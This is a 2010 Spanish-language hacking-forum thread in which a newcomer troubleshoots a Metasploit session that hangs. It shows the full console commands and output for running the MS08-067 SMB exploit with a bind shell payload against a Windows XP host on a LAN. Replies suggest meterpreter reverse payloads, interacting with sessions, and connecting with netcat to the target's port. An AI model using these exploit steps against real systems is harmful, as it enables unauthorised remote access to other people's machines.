Problema Metasploit

Iniciado por marcucho, 21 Julio 2010, 12:45 PM

0 Miembros y 2 Visitantes están viendo este tema.

marcucho

Hola a todos.
Tengo un pequeño problema con metasploit, realizo los siguiente para obtener una shell

msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.53
RHOST => 192.168.1.53
msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/bind_tcp
PAYLOAD => windows/shell/bind_tcp
msf exploit(ms08_067_netapi) > show options

Module options:

  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOST    192.168.1.53     yes       The target address
  RPORT    445              yes       Set the SMB service port
  SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Payload options (windows/shell/bind_tcp):

  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  EXITFUNC  thread           yes       Exit technique: seh, thread, process
  LPORT     4444             yes       The listen port
  RHOST     192.168.1.53     no        The target address


Exploit target:

  Id  Name
  --  ----
  0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

Dándome como resultado el siguiente:

  • Started bind handler
  • Automatically detecting the target...
  • Fingerprint: Windows XP Service Pack 3 - lang:Spanish
  • Selected Target: Windows XP SP3 Spanish (NX)
  • Attempting to trigger the vulnerability...
  • Sending stage (240 bytes) to 192.168.1.53
  • Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010



    Pero se queda hay no me aparece la shell, es decir,


    Microsoft Windows XP [Versi¢n 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>



    No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

    Espero vuestra contestación y gracias de antemano.

kamsky

haz un nmap al puerto 4444 al pc víctima a ver que dice...
----NO HAY ARMA MÁS MORTÍFERA QUE UNA PALABRA BROTADA DE UN CORAZÓN NOBLE, Y UN PAR DE HUEVOS QUE LA RESPALDEN---

                       hack 4 free!!

Søra

usa el payload reverse meterpreter tcp y luego sessions -l y veras la sesiones activas que sera una la que acabas de conseguir asi que sessions y el numero y ya esta la shell del meterpreter q aunq sea diferente tiene mas opciones por ejemplo upload para subir archivos....


Saludos Søra





Se busca sabio para intercambio:
Todo lo que se por la mitad de lo que desconozco.

Debci

Porque aun no has mirado las sessiones?
Cuando las mires haz:

sessions -i (de interactuar xD) numSession

En tu caso quedaria algo asi:

sessions -i 1


Y obtendrias la shell remota :)

wACtOr

#4
ummm

CitarPero se queda hay no me aparece la shell, es decir,


Microsoft Windows XP [Versi¢n 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>



No tengo ni idea el motivo por el cual me sucede esto, no se si falta instalar algun paquete de ubuntu o cualquier otra cosa. También decir que soy nuevo en esto.

Espero vuestra contestación y gracias de antemano.


Ya tienes la shell. Por lo que veo estas usando ubuntu y tras lanzar el exploit te aparece:
C:\WINDOWS\System32> 

Pues ya tienes la shell del pc victima :S



no??

marcucho

Es que ese es el problema que se queda en blanco, no aparece esto:

C:\WINDOWS\system32>

Cuando da el ok que todo lo ha hecho bien, esto
--------------------------------------------------------------------------------------

*Started bind handler
*Automatically detecting the target...
*Fingerprint: Windows XP Service Pack 3 - lang:Spanish
*Selected Target: Windows XP SP3 Spanish (NX)
*Attempting to trigger the vulnerability...
*Sending stage (240 bytes) to 192.168.1.53
*Command shell session 1 opened (192.168.1.39:44074 -> 192.168.1.53:4444) at Wed Jul 21 12:34:19 +0200 2010


-----------------------------------------------------------------------------------------------


Después debe tardar unos segundo o milésimas en aparece C:\WINDOWS\system32>
bueno pues a mi no me aparece, y yo me quedo esperando 10 minutos y no aparece, y cual es el problema que no puedo hacer:

sessions -i 1

porque tampoco aparece msf >, se queda en blanco, no se si es que da algún error interno que no muestra, se queda como colgado lo único que me queda es ctrl + c y claro cierra sesión.

Gracias a todos por contestar.

Debci

prueba a hacer nc al 4444 de la victima y probablemente obtengas la shell :)

Saludos

wACtOr

por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.

Debci

Cita de: wACtOr en 21 Julio 2010, 18:57 PM
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
Si no quieres muchos problemas prueba Backtrack4 xD

Saludos

[L]ord [R]NA

Cita de: wACtOr en 21 Julio 2010, 18:57 PM
por lo visto es parece un problema del msf. Cuando tiene que abrir la sesion se debe cerrar por algun error.

Como as instalado MSF?

Creo que lo mejor es instalarlo desde svn.
+1, las veces que lo he instalado lo hago desde SVN